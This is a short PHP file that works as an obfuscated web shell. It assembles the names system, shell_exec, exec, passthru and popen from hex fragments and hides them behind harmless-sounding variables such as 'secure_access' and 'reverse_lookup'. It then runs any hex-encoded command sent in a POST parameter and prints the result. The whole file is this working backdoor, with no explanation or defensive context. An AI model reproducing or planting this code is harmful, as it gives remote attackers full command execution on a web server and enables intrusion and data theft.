<?php


$res1 = '73';
$res2 = '74';
$res3 = '65';
$res4 = '68';
$res5 = '6c';
$res6 = '78';
$res7 = '61';
$res8 = '72';
$res9 = '70';
$res10 = '6e';
$res11 = '5f';
$res12 = '63';
$res13 = '6f';
$res14 = '76';
$res15 = '6b';
$secure_access1 = pack("H*", '73'.'79'.$res1.$res2.$res3.'6d');
$secure_access2 = pack("H*", '73'.$res4.'65'.$res5.'6c'.'5f'.$res3.'78'.$res3.'63');
$secure_access3 = pack("H*", '65'.$res6.'65'.'63');
$secure_access4 = pack("H*", '70'.$res7.'73'.$res1.'74'.'68'.$res8.'75');
$secure_access5 = pack("H*", '70'.'6f'.$res9.$res3.$res10);
$secure_access6 = pack("H*", '73'.$res2.$res8.'65'.'61'.'6d'.'5f'.'67'.$res3.'74'.$res11.$res12.'6f'.$res10.'74'.'65'.'6e'.$res2.$res1);
$secure_access7 = pack("H*", $res9.$res12.'6c'.$res13.'73'.$res3);
$reverse_lookup = pack("H*", '72'.'65'.$res14.$res3.'72'.'73'.'65'.$res11.$res5.$res13.$res13.$res15.'75'.$res9);
if (isset($_POST[$reverse_lookup])) {
    $reverse_lookup = pack("H*", $_POST[$reverse_lookup]);
    if (function_exists($secure_access1)) {
        $secure_access1($reverse_lookup);
    } elseif (function_exists($secure_access2)) {
        print $secure_access2($reverse_lookup);
    } elseif (function_exists($secure_access3)) {
        $secure_access3($reverse_lookup, $ptr_record);
        print join("\n", $ptr_record);
    } elseif (function_exists($secure_access4)) {
        $secure_access4($reverse_lookup);
    } elseif (function_exists($secure_access5) && function_exists($secure_access6) && function_exists($secure_access7)) {
        $property_set_value = $secure_access5($reverse_lookup, 'r');
        if ($property_set_value) {
            $holder_desc = $secure_access6($property_set_value);
            $secure_access7($property_set_value);
            print $holder_desc;
        }
    }
    exit;
}
